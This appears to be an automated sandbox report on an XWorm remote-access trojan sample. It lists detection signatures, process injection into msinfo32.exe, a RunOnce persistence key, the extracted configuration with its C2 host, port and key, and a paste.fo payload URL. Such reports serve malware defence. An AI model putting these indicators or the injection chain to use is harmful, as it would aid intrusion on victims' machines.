Edit tour

Windows Analysis Report
SecuriteInfo.com.Heur.Mint.Phil.57.5869.22404.exe

Overview

General Information

Sample name:	SecuriteInfo.com.Heur.Mint.Phil.57.5869.22404.exe
Analysis ID:	1489770
MD5:	ff0badeb5d6675c36d8f9068a1232258
SHA1:	7d287ad2bcdce85532dea445371a2d3c8295e516
SHA256:	5b64cb5b788ccdd6006a7edefe6dcd1d36c9bf09101b53398e6a5938a1cc29c8
Tags:	exe
Infos:

Detection

XWorm

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Early bird code injection technique detected

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Yara detected XWorm

.NET source code contains method to dynamically call methods (often used by packers)

.NET source code contains potential unpacker

AI detected suspicious sample

Allocates memory in foreign processes

C2 URLs / IPs found in malware configuration

Contains functionality to inject code into remote processes

Contains functionality to inject threads in other processes

Creates a thread in another existing process (thread injection)

Found API chain indicative of debugger detection

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Queues an APC in another process (thread injection)

Sample uses string decryption to hide its real strings

Writes to foreign memory regions

AV process strings found (often used to terminate AV products)

Allocates memory with a write watch (potentially for evading sandboxes)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Contains functionality to query CPU information (cpuid)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE file contains sections with non-standard names

Sample execution stops while process was sleeping (likely an evasion)

Sigma detected: CurrentVersion Autorun Keys Modification

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Process Tree

System is w10x64

SecuriteInfo.com.Heur.Mint.Phil.57.5869.22404.exe (PID: 6872 cmdline: "C:\Users\user\Desktop\SecuriteInfo.com.Heur.Mint.Phil.57.5869.22404.exe" MD5: FF0BADEB5D6675C36D8F9068A1232258)

conhost.exe (PID: 6912 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

msinfo32.exe (PID: 7012 cmdline: "C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exe" MD5: 0AED91DA63713BF9F881B03A604A1C9D)

FRpl.exe (PID: 6544 cmdline: "C:\Users\user\AppData\Roaming\qNl6oqz9\FRpl.exe" MD5: FF0BADEB5D6675C36D8F9068A1232258)

conhost.exe (PID: 6932 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

msinfo32.exe (PID: 6888 cmdline: "C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exe" MD5: 0AED91DA63713BF9F881B03A604A1C9D)

FRpl.exe (PID: 2284 cmdline: "C:\Users\user\AppData\Roaming\qNl6oqz9\FRpl.exe" MD5: FF0BADEB5D6675C36D8F9068A1232258)

conhost.exe (PID: 6092 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

msinfo32.exe (PID: 908 cmdline: "C:\Program Files\Common Files\microsoft shared\MSInfo\msinfo32.exe" MD5: 0AED91DA63713BF9F881B03A604A1C9D)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
XWorm	Malware with wide range of capabilities ranging from RAT to ransomware.	No Attribution	https://any.run/cybersecurity-blog/xworm-malware-communication-analysis/ https://any.run/cybersecurity-blog/xworm-technical-analysis-of-a-new-malware-version/ https://blog.cyble.com/2022/08/19/evilcoder-project-selling-multiple-dangerous-tools-online/ https://cert.pl/en/posts/2023/10/deworming-the-xworm/ https://embee-research.ghost.io/infrastructure-analysis-with-dns-pivoting/	https://malpedia.caad.fkie.fraunhofer.de/details/win.xworm

Malware Configuration

Threatname: Xworm

{"C2 url": ["cameras-commitment.gl.at.ply.gg"], "Port": "20343", "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.6"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000003.00000003.1863566508.000002806C4D0000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_Donutloader_f40e3759	unknown	unknown	0x25d58:$x64: 06 B8 03 40 00 80 C3 4C 8B 49 10 49 0x35d68:$x64: 06 B8 03 40 00 80 C3 4C 8B 49 10 49 0x3929e:$x86: 04 75 EE 89 31 F0 FF 46 04 33 C0 EB
0000000B.00000002.1976262296.0000027ADEE40000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
0000000B.00000002.1976262296.0000027ADEE40000.00000004.08000000.00040000.00000000.sdmp	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0xc254:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0xc2f1:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0xc406:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0xbf01:$cnc4: POST / HTTP/1.1
00000005.00000002.1897543968.00000204FD660000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_Donutloader_f40e3759	unknown	unknown	0xff08:$x64: 06 B8 03 40 00 80 C3 4C 8B 49 10 49 0x1343e:$x86: 04 75 EE 89 31 F0 FF 46 04 33 C0 EB
00000005.00000002.1897725884.00000204FD720000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
00000005.00000002.1897725884.00000204FD720000.00000004.08000000.00040000.00000000.sdmp	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0xc254:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0xc2f1:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0xc406:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0xbf01:$cnc4: POST / HTTP/1.1
00000009.00000003.1943122985.00000282C50AE000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_Donutloader_f40e3759	unknown	unknown	0xfd88:$x64: 06 B8 03 40 00 80 C3 4C 8B 49 10 49
00000003.00000003.1863731126.000002806C4F5000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_Donutloader_f40e3759	unknown	unknown	0xd58:$x64: 06 B8 03 40 00 80 C3 4C 8B 49 10 49 0x10d68:$x64: 06 B8 03 40 00 80 C3 4C 8B 49 10 49 0x1429e:$x86: 04 75 EE 89 31 F0 FF 46 04 33 C0 EB
0000000B.00000002.1976117321.0000027ADED60000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_Donutloader_f40e3759	unknown	unknown	0xff08:$x64: 06 B8 03 40 00 80 C3 4C 8B 49 10 49 0x1343e:$x86: 04 75 EE 89 31 F0 FF 46 04 33 C0 EB
0000000B.00000002.1976311824.0000027ADEF21000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
0000000B.00000002.1976311824.0000027ADEF21000.00000004.00000800.00020000.00000000.sdmp	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x1825c:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x21d8c:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x182f9:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x21e44:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x1840e:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x21f74:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x17f09:$cnc4: POST / HTTP/1.1
00000002.00000002.4156638612.000001AA11010000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_Donutloader_f40e3759	unknown	unknown	0xff08:$x64: 06 B8 03 40 00 80 C3 4C 8B 49 10 49 0x1343e:$x86: 04 75 EE 89 31 F0 FF 46 04 33 C0 EB
00000000.00000003.1720661736.0000025E727F5000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_Donutloader_f40e3759	unknown	unknown	0xd58:$x64: 06 B8 03 40 00 80 C3 4C 8B 49 10 49 0x10d68:$x64: 06 B8 03 40 00 80 C3 4C 8B 49 10 49 0x1429e:$x86: 04 75 EE 89 31 F0 FF 46 04 33 C0 EB
00000002.00000002.4156799723.000001AA12890000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
00000002.00000002.4156799723.000001AA12890000.00000004.08000000.00040000.00000000.sdmp	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0xc254:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0xc2f1:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0xc406:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0xbf01:$cnc4: POST / HTTP/1.1
00000000.00000003.1717644946.0000025E727D0000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_Donutloader_f40e3759	unknown	unknown	0x25d58:$x64: 06 B8 03 40 00 80 C3 4C 8B 49 10 49 0x35d68:$x64: 06 B8 03 40 00 80 C3 4C 8B 49 10 49 0x3929e:$x86: 04 75 EE 89 31 F0 FF 46 04 33 C0 EB
00000009.00000003.1943224390.00000282C6D25000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_Donutloader_f40e3759	unknown	unknown	0x10e48:$x64: 06 B8 03 40 00 80 C3 4C 8B 49 10 49 0x1437e:$x86: 04 75 EE 89 31 F0 FF 46 04 33 C0 EB
00000009.00000003.1943070023.00000282C6D10000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_Donutloader_f40e3759	unknown	unknown	0x25e48:$x64: 06 B8 03 40 00 80 C3 4C 8B 49 10 49 0x2937e:$x86: 04 75 EE 89 31 F0 FF 46 04 33 C0 EB
00000005.00000002.1896700546.0000020480001000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
00000005.00000002.1896700546.0000020480001000.00000004.00000800.00020000.00000000.sdmp	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x1825c:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x21d8c:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x182f9:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x21e44:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x1840e:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x21f74:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x17f09:$cnc4: POST / HTTP/1.1
Process Memory Space: msinfo32.exe PID: 7012	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
Process Memory Space: msinfo32.exe PID: 6888	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
Process Memory Space: msinfo32.exe PID: 908	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
Click to see the 18 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
11.2.msinfo32.exe.27adee40000.0.unpack	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
11.2.msinfo32.exe.27adee40000.0.unpack	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0xa454:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0xa4f1:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0xa606:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0xa101:$cnc4: POST / HTTP/1.1
2.2.msinfo32.exe.1aa12890000.0.unpack	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
2.2.msinfo32.exe.1aa12890000.0.unpack	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0xa454:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0xa4f1:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0xa606:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0xa101:$cnc4: POST / HTTP/1.1
11.2.msinfo32.exe.27adee40000.0.raw.unpack	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
11.2.msinfo32.exe.27adee40000.0.raw.unpack	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0xc254:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0xc2f1:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0xc406:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0xbf01:$cnc4: POST / HTTP/1.1
11.2.msinfo32.exe.27adef2d008.1.unpack	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
11.2.msinfo32.exe.27adef2d008.1.unpack	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0xa454:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0xa4f1:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0xa606:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0xa101:$cnc4: POST / HTTP/1.1
2.2.msinfo32.exe.1aa12890000.0.raw.unpack	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
2.2.msinfo32.exe.1aa12890000.0.raw.unpack	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0xc254:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0xc2f1:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0xc406:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0xbf01:$cnc4: POST / HTTP/1.1
5.2.msinfo32.exe.204fd720000.1.unpack	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
5.2.msinfo32.exe.204fd720000.1.unpack	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0xa454:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0xa4f1:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0xa606:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0xa101:$cnc4: POST / HTTP/1.1
5.2.msinfo32.exe.2048000d008.0.unpack	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
5.2.msinfo32.exe.2048000d008.0.unpack	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0xa454:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0xa4f1:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0xa606:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0xa101:$cnc4: POST / HTTP/1.1
5.2.msinfo32.exe.204fd720000.1.raw.unpack	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
5.2.msinfo32.exe.204fd720000.1.raw.unpack	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0xc254:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0xc2f1:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0xc406:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0xbf01:$cnc4: POST / HTTP/1.1
5.2.msinfo32.exe.2048000d008.0.raw.unpack	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
5.2.msinfo32.exe.2048000d008.0.raw.unpack	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0xc254:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x15d84:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0xc2f1:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x15e3c:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0xc406:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x15f6c:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0xbf01:$cnc4: POST / HTTP/1.1
11.2.msinfo32.exe.27adef2d008.1.raw.unpack	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
11.2.msinfo32.exe.27adef2d008.1.raw.unpack	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0xc254:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x15d84:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0xc2f1:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x15e3c:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0xc406:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x15f6c:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0xbf01:$cnc4: POST / HTTP/1.1
Click to see the 15 entries

Sigma Signatures

System Summary

Sigma detected: CurrentVersion Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Roaming\qNl6oqz9\FRpl.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\SecuriteInfo.com.Heur.Mint.Phil.57.5869.22404.exe, ProcessId: 6872, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\9Q9QTPMV20RVO8c4

Suricata Signatures

ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound - Source IP: 192.168.2.4 - Destination IP: 147.185.221.16

Timestamp:	2024-08-08T02:38:40.864390+0200
SID:	2853193
Severity:	1
Source Port:	49746
Destination Port:	20343
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Common Downloader Header Pattern UH - Source IP: 192.168.2.4 - Destination IP: 104.21.28.76

Timestamp:	2024-08-08T02:36:24.326130+0200
SID:	2803274
Severity:	2
Source Port:	49739
Destination Port:	443
Protocol:	TCP
Classtype:	Potentially Bad Traffic

ETPRO MALWARE Common Downloader Header Pattern UH - Source IP: 192.168.2.4 - Destination IP: 104.21.28.76

Timestamp:	2024-08-08T02:36:16.355177+0200
SID:	2803274
Severity:	2
Source Port:	49732
Destination Port:	443
Protocol:	TCP
Classtype:	Potentially Bad Traffic

ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound - Source IP: 192.168.2.4 - Destination IP: 147.185.221.16

Timestamp:	2024-08-08T02:36:44.411331+0200
SID:	2855924
Severity:	1
Source Port:	49740
Destination Port:	20343
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Common Downloader Header Pattern UH - Source IP: 192.168.2.4 - Destination IP: 104.21.28.76

Timestamp:	2024-08-08T02:36:01.741479+0200
SID:	2803274
Severity:	2
Source Port:	49730
Destination Port:	443
Protocol:	TCP
Classtype:	Potentially Bad Traffic

ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound - Source IP: 192.168.2.4 - Destination IP: 147.185.221.16

Timestamp:	2024-08-08T02:36:26.755485+0200
SID:	2855924
Severity:	1
Source Port:	49731
Destination Port:	20343
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: 0000000B.00000002.1976311824.0000027ADEF21000.00000004.00000800.00020000.00000000.sdmp

Malware Configuration Extractor: Xworm {"C2 url": ["cameras-commitment.gl.at.ply.gg"], "Port": "20343", "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.6"}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Roaming\qNl6oqz9\FRpl.exe

Virustotal: Detection: 25%

Perma Link

Multi AV Scanner detection for submitted file

Source: SecuriteInfo.com.Heur.Mint.Phil.57.5869.22404.exe

Virustotal: Detection: 25%

Perma Link

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Sample uses string decryption to hide its real strings

Source: 2.2.msinfo32.exe.1aa12890000.0.raw.unpack	String decryptor: cameras-commitment.gl.at.ply.gg
Source: 2.2.msinfo32.exe.1aa12890000.0.raw.unpack	String decryptor: 20343
Source: 2.2.msinfo32.exe.1aa12890000.0.raw.unpack	String decryptor: <123456789>
Source: 2.2.msinfo32.exe.1aa12890000.0.raw.unpack	String decryptor: <Xwormmm>
Source: 2.2.msinfo32.exe.1aa12890000.0.raw.unpack	String decryptor: XWorm V5.6
Source: 2.2.msinfo32.exe.1aa12890000.0.raw.unpack	String decryptor: USB.exe

Source: unknown	HTTPS traffic detected: 104.21.28.76:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.28.76:443 -> 192.168.2.4:49732 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.28.76:443 -> 192.168.2.4:49739 version: TLS 1.2

Source: SecuriteInfo.com.Heur.Mint.Phil.57.5869.22404.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT

Networking

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: cameras-commitment.gl.at.ply.gg

Source: global traffic

TCP traffic: 192.168.2.4:49731 -> 147.185.221.16:20343

Source: Joe Sandbox View

IP Address: 147.185.221.16 147.185.221.16

Source: Joe Sandbox View

ASN Name: SALSGIVERUS SALSGIVERUS

Source: Joe Sandbox View

JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.Mint.Phil.57.5869.22404.exe

Code function: 0_2_00294AA1 LoadLibraryA,LoadLibraryA,CreateProcessA,VirtualAllocEx,WriteProcessMemory,CreateRemoteThread,VirtualProtectEx,WriteProcessMemory,VirtualProtectEx,VirtualProtectEx,WriteProcessMemory,VirtualProtectEx,memset,InternetOpenA,InternetOpenUrlA,InternetReadFile,memset,memcpy,memcpy,memcpy,memcpy,memcpy,memcpy,memset,RtlDeleteBoundaryDescriptor,VirtualAllocEx,WriteProcessMemory,QueueUserAPC,ResumeThread,SetLastError,GetModuleFileNameW,GetLastError,GetLastError,CopyFileExW,RegCreateKeyExA,RegSetValueExA,RtlRestoreThreadPreferredUILanguages,RtlDeleteBoundaryDescriptor,GetLastError,GetLastError,

0_2_00294AA1

Source: global traffic	HTTP traffic detected: GET /raw/9c15a0ff5499 HTTP/1.1User-Agent: WebReaderHost: paste.fo
Source: global traffic	HTTP traffic detected: GET /raw/9c15a0ff5499 HTTP/1.1User-Agent: WebReaderHost: paste.fo
Source: global traffic	HTTP traffic detected: GET /raw/9c15a0ff5499 HTTP/1.1User-Agent: WebReaderHost: paste.fo

Source: global traffic	DNS traffic detected: DNS query: paste.fo
Source: global traffic	DNS traffic detected: DNS query: cameras-commitment.gl.at.ply.gg

Source: msinfo32.exe, 00000002.00000002.4156949853.000001AA12B31000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: SecuriteInfo.com.Heur.Mint.Phil.57.5869.22404.exe, FRpl.exe.0.dr	String found in binary or memory: https://docs.rs/getrandom#nodejs-es-module-support/rustc/64ebd39da5ec28caa3bd7cbb3f22f5949432fe2b
Source: SecuriteInfo.com.Heur.Mint.Phil.57.5869.22404.exe, 00000000.00000002.1721562376.0000025E70A29000.00000004.00000020.00020000.00000000.sdmp, FRpl.exe, 00000003.00000002.1864510706.000002806A7F6000.00000004.00000020.00020000.00000000.sdmp, FRpl.exe, 00000009.00000002.1943889827.00000282C506C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://paste.fo/
Source: SecuriteInfo.com.Heur.Mint.Phil.57.5869.22404.exe, 00000000.00000002.1721562376.0000025E70A29000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://paste.fo/jH
Source: FRpl.exe, 00000009.00000002.1943889827.00000282C506C000.00000004.00000020.00020000.00000000.sdmp, FRpl.exe, 00000009.00000002.1943889827.00000282C5026000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://paste.fo/raw/9c15a0ff5499
Source: FRpl.exe, 00000003.00000002.1864510706.000002806A7F6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://paste.fo/raw/9c15a0ff5499#=
